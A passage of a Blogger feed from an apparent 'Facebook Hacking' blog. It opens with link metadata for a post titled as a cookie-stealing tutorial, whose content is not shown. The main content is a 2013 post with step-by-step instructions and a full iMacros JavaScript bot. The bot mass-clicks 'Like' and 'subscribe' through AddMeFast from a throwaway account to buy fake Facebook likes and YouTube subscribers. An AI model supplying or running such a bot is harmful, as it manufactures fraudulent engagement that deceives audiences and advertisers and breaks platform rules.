</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/4761770021741023867/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-make-cookie-logger-cookies.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/4761770021741023867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/4761770021741023867'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-make-cookie-logger-cookies.html' title='How to Make Cookie Logger / Cookies Stealing Tutorial'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirIElGhSZmxssRR35AWPsNbvy6u2Ye0E2ZWlaklZKZKwsonFSJwVehcPUniZrb8mtMyHus6ddltmVQ0MdAt-LCRW1dZdXwBVI8b4FyD_OJoWLdGxAI7Vm2NcvcEH2m4OTe25nKRge5M5fC/s72-c/internet-cookies.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-7188798582535206366</id><published>2013-01-04T11:25:00.002-08:00</published><updated>2013-07-31T04:11:40.477-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Articles"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="How-To Guides"/><title type='text'>Get Unlimited FB Page Likes (2013) </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 17.999990463256836px;&quot;&gt;Hello Friends Previously i have posted about &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/post-facebook-status-with-someone-elses.html&quot;&gt;How To Post Facebook Status With Some Else Account&lt;/a&gt;&amp;nbsp;and also &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/get-someones-ip-address-with-their.html&quot;&gt;How To Get Someone IP Address And Location In Facebook&lt;/a&gt;. Today i have decided to write about how to get Facebook Likes in just one week.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;line-height: 17.999990463256836px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Facebook is very popular and nearly all people use this and many of them are very curious about how to get more likes on&amp;nbsp;Facebook Page so this post is dedicated to you.&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;Requirements:&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;*Firefox&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;*IMacros Firefox Plugin&lt;/span&gt;&lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/imacros-for-firefox/&quot; style=&quot;-webkit-transition: all 0.5s ease-in-out; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;https://addons.mozilla.org/en-US/firefox...r-firefox/&lt;/a&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;*My JavaScript&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.mediafire.com/?kuqjqz779bkob6w&quot; style=&quot;-webkit-transition: all 0.5s ease-in-out; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;AddMeFastAutoLiker.js&lt;/a&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;*Addmefast Account Register&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://addm.co/?6MV5UHW&quot; style=&quot;-webkit-transition: all 0.5s ease-in-out; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;AddMeFast - FREE Social Promotion&lt;/a&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;highlight&quot; style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 3px 0px;&quot;&gt;Facebook&lt;/span&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&amp;nbsp;account&amp;nbsp;[/font]&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;1.Open Firefox then download the Imacros plugin link above.&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;2.Now download my Javascript&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;3.Once downloaded go to documents--&amp;gt;imacros--&amp;gt;Macros--&amp;gt;Demo-Firefox and drop the&amp;nbsp;&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;download addmefastbot.js script file in here should look similar to this...pic bellow.&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;img alt=&quot;[Image: 2uz6x5z.png]&quot; border=&quot;0&quot; src=&quot;http://i48.tinypic.com/2uz6x5z.png&quot; style=&quot;border: none; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; max-width: 100%;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;4.Now close Firefox and open it again so the js file will be in imacros.&lt;br /&gt;&lt;br /&gt;5.Register an account with AddMeFast link above in requirements&lt;br /&gt;&lt;br /&gt;6.Now go to MySites on Addmefast then hit the plus sign choose&amp;nbsp;&lt;span class=&quot;highlight&quot; style=&quot;padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;&amp;nbsp;likes&lt;br /&gt;and type in your&amp;nbsp;&lt;span class=&quot;highlight&quot; style=&quot;padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;&amp;nbsp;page you want liking in the URL also make sure daily clicks&lt;br /&gt;and total clicks are set to OFF and in CPC set to 8 and hit save changes&lt;br /&gt;Note:If you want youtube subscribes just change it to youtube subscribes or likes or&lt;br /&gt;&lt;span class=&quot;highlight&quot; style=&quot;padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;&amp;nbsp;subscribes with the same setup.&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;img alt=&quot;[Image: 167qqub.png]&quot; border=&quot;0&quot; src=&quot;http://i46.tinypic.com/167qqub.png&quot; style=&quot;border: none; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; max-width: 100%;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;7.Now open up a new tab on firefox and login with you&amp;nbsp;&lt;span class=&quot;highlight&quot; style=&quot;padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;&amp;nbsp;account make sure its a shit&lt;br /&gt;account because the script is gonna be earning you loads of points by liking 1000s of pages.&lt;br /&gt;&lt;br /&gt;8.Now close the&amp;nbsp;&lt;span class=&quot;highlight&quot; style=&quot;padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;&amp;nbsp;tab stay on addmefast page and doubleclick the imacros icon&lt;br /&gt;top right corner of your firefox page blue icon then a imacros tab should appear&lt;br /&gt;left hand side of the browser&lt;br /&gt;&lt;br /&gt;9.Now double click Demo-Firefox then double click AddmeFastBot.js should look like this:&lt;/span&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;img alt=&quot;[Image: 2lb1i75.png]&quot; border=&quot;0&quot; src=&quot;http://i46.tinypic.com/2lb1i75.png&quot; style=&quot;border: none; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; max-width: 100%;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;br style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot; /&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;10.Now just type in there 1000000 and click okay&lt;br /&gt;&lt;br /&gt;11.Now this will just start earning you points and because you added your link at the beggining&lt;br /&gt;of the tutorial you will now constantly get likes aslong as your bot is running.&lt;br /&gt;&lt;br /&gt;Personally i got 100 page likes in like 2 hours and i just left it running now the bot is running&lt;br /&gt;go and check your&amp;nbsp;&lt;span class=&quot;highlight&quot; style=&quot;padding: 3px 0px;&quot;&gt;facebook&lt;/span&gt;&amp;nbsp;likes,subs or youtube views,subs or likes you will be impressed as long&lt;br /&gt;as you leave the bot running you will keep getting boosted&amp;nbsp;&lt;img alt=&quot;[Image: icon_e_wink.gif]&quot; border=&quot;0&quot; src=&quot;http://flashacking.net/images/smilies/icon_e_wink.gif&quot; style=&quot;border: none; max-width: 100%;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;=================================================&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;&quot;&gt;My JavaScript&amp;nbsp;&lt;/span&gt;AddMeFastAutoLiker.js&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;//Made by thearmykid AKA Kris ProHacks&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;var macroStart;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart =&quot;CODE:&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;SET !ERRORIGNORE YES&quot; + &quot;\n&quot;;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;SET !TIMEOUT_TAG 1&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;SET !TIMEOUT_STEP 1&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;SET !TIMEOUT_PAGE 30&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot; SET !REPLAYSPEED FAST&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;SET !TIMEOUT_MACRO 150&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;TAB T=1&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;WAIT SECONDS=0&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAG POS=1 TYPE=A ATTR=TXT:Facebook&lt;sp&gt;Likes&quot; + &quot;\n&quot;;&lt;/sp&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAG POS=1 TYPE=A ATTR=TXT:Like&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot; FRAME F=0&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAG POS=1 TYPE=INPUT:SUBMIT ATTR=VALUE:Like&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=3&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=1&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart += &quot;TAB CLOSEALLOTHERS&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;TAG POS=1 TYPE=INPUT:BUTTON FORM=ID:form1 ATTR=ID:subscribeButton&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=3&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;TAG POS=1 TYPE=IMG ATTR=SRC:&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.addmefast.com/images/layout/bottom_arrow.png&quot; title=&quot;Linkification: http://www.addmefast.com/images/layout/bottom_arrow.png&quot;&gt;http://www.addmefast.com/images/layout/bottom_arrow.png&lt;/a&gt;&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAG POS=1 TYPE=A ATTR=TXT:Like&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot; FRAME F=0&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAG POS=1 TYPE=INPUT:SUBMIT ATTR=VALUE:Like&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=1&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart += &quot;TAB CLOSEALLOTHERS&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart +=&quot;TAG POS=1 TYPE=INPUT:BUTTON FORM=ID:form1 ATTR=ID:subscribeButton&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=3&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;TAG POS=1 TYPE=IMG ATTR=SRC:&lt;a class=&quot;linkification-ext&quot; href=&quot;http://www.addmefast.com/images/layout/bottom_arrow.png&quot; title=&quot;Linkification: http://www.addmefast.com/images/layout/bottom_arrow.png&quot;&gt;http://www.addmefast.com/images/layout/bottom_arrow.png&lt;/a&gt;&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAG POS=1 TYPE=A ATTR=TXT:Like&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot; FRAME F=0&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAG POS=1 TYPE=INPUT:SUBMIT ATTR=VALUE:Like&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;macroStart +=&quot;WAIT SECONDS=2&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Verdana, Arial, sans-serif; font-size: xx-small;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&amp;nbsp; &amp;nbsp; macroStart += &quot;TAB T=1&quot; + &quot;\n&quot;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
